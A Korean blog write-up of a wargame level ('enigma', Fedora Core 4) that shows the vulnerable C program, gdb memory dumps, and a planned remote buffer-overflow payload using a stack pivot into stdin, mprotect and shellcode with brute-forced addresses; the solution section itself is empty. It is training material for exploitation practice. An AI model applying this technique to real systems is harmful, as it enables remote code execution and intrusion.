둘둘리둘둘리둘둘리둘둘리둘둘리둘

[ Fedora Core 4 ] cruel -> enigma 본문

War game/해커 스쿨 FC4

[ Fedora Core 4 ] cruel -> enigma

dool2ly 2015. 9. 6. 19:15

/*

        The Lord of the BOF : The Fellowship of the BOF

        - enigma

        - Remote BOF on Fedora Core 4

        - hint : ?

        - port : TCP 7777

*/


#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <unistd.h>


int vuln(int canary,char *ptr)

{

        char buffer[256];

        int *ret;


        // stack overflow!!

        strcpy(buffer,ptr);


        // overflow protected

        if(canary != 0x31337)

        {

                printf("who broke my canary?!");

                exit(1);

        }


        // preventing RTL

        ret = &canary - 1;

        if((*ret & 0xff000000) == 0)

        {

                printf("I've an allergy to NULL");

                exit(1);

        }


        // clearing attack buffer

        memset(ptr, 0, 1024);


        return 0;

}


int main()

{

        char buffer[1024];


        printf("enigma : The brothers will be glad to have you!\n");

        printf("you : ");

        fflush(stdout);


        // give me a food!

        fgets(buffer, 1024, stdin);


        // oops~!

        vuln(0x31337, buffer);


        // bye bye

        exit(0);

}


슈퍼데몬으로 7777포트에 서비스함 -> 쉘만 띄우면 됨


[Fedora Core 3] dark_eyes -> hell+fire (http://dool2ly.tistory.com/32) 문제처럼


stdin에 커스텀 스텍을 구축하고 leave-ret을 통해 ebp를 커스텀 스텍으로 이동 시킨후 


mprotect함수를 이용해 커스텀스텍에 실행권한을 준후 쉘코드를 실행하면 되겠다.




(gdb) b *vuln+142

Breakpoint 1 at 0x804858e

(gdb) r

Starting program: /home/cruel/enigma

Reading symbols from shared object read from target memory...(no debuggi                ng symbols found)...done.

Loaded system supplied DSO at 0x768000

(no debugging symbols found)

(no debugging symbols found)

enigma : The brothers will be glad to have you!

you : DDDD


Breakpoint 1, 0x0804858e in vuln ()

(gdb) x/24 $esp

0xbf8b2590:     0x00000000      0x55e9b0a6      0x38c5dbe8      0x55e9b0                a6

0xbf8b25a0:     0x39e7bb60      0x44444444      0x15dd000a      0x000000                02

0xbf8b25b0:     0x00000000      0x008caff4      0x008cb740      0x008cb5                e0

0xbf8b25c0:     0xbf8b25e0      0x00804da0      0x00861493      0x008caf                f4

0xbf8b25d0:     0x0080574f      0x00000000      0xb7fb1000      0x000004                00

0xbf8b25e0:     0xbf8b2600      0x0080459d      0x008cb740      0xb7fb10                00

(gdb) x $ebp

0xbf8b26a8:     0xbf8b2ad8


0xbf8b26a8 - 0xbf8b25a4 = 0x104(260)으로 버퍼사이즈는 260byte고




(gdb) x/4wx *0x0804985c

0x8cb740 <_IO_2_1_stdin_>:      0xfbad2288      0xb7ff3005      0xb7ff3005      0xb7ff3000

(gdb) r

The program being debugged has been started already.

Start it from the beginning? (y or n) y

warning: cannot close "shared object read from target memory": File in wrong format


Starting program: /home/cruel/enigma

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x3c6000

(no debugging symbols found)

(no debugging symbols found)

enigma : The brothers will be glad to have you!

you : DDDD


Breakpoint 1, 0x0804858e in vuln ()

(gdb) x/4wx *0x0804985c

0x8cb740 <_IO_2_1_stdin_>:      0xfbad2288      0xb7f05005      0xb7f05005      0xb7f05000


stdin의 주소는 0xb7f--000으로 계속 바뀐다.


그럼 페이로드는 아래와 같이 짜고..

dummy(260) | 0xb7f--10c | leave-ret | 0x31337 | mprotect | 0xb7f--12c | 0xb7f--000 | 0x800 | 0x07 | shell code


stdin의 위치는 부르트포싱을 통해 .... 해결하면 되겠다.


--풀이--



저작자표시 비영리

'War game > 해커 스쿨 FC4' 카테고리의 다른 글

[ Fedora Core 4 ] enigma -> titan(clear)  (14) 2015.09.08
[ Fedora Core 4 ] dark_stone -> cruel  (0) 2015.08.25
공유하기 링크
'War game/해커 스쿨 FC4' Related Articles more
Comments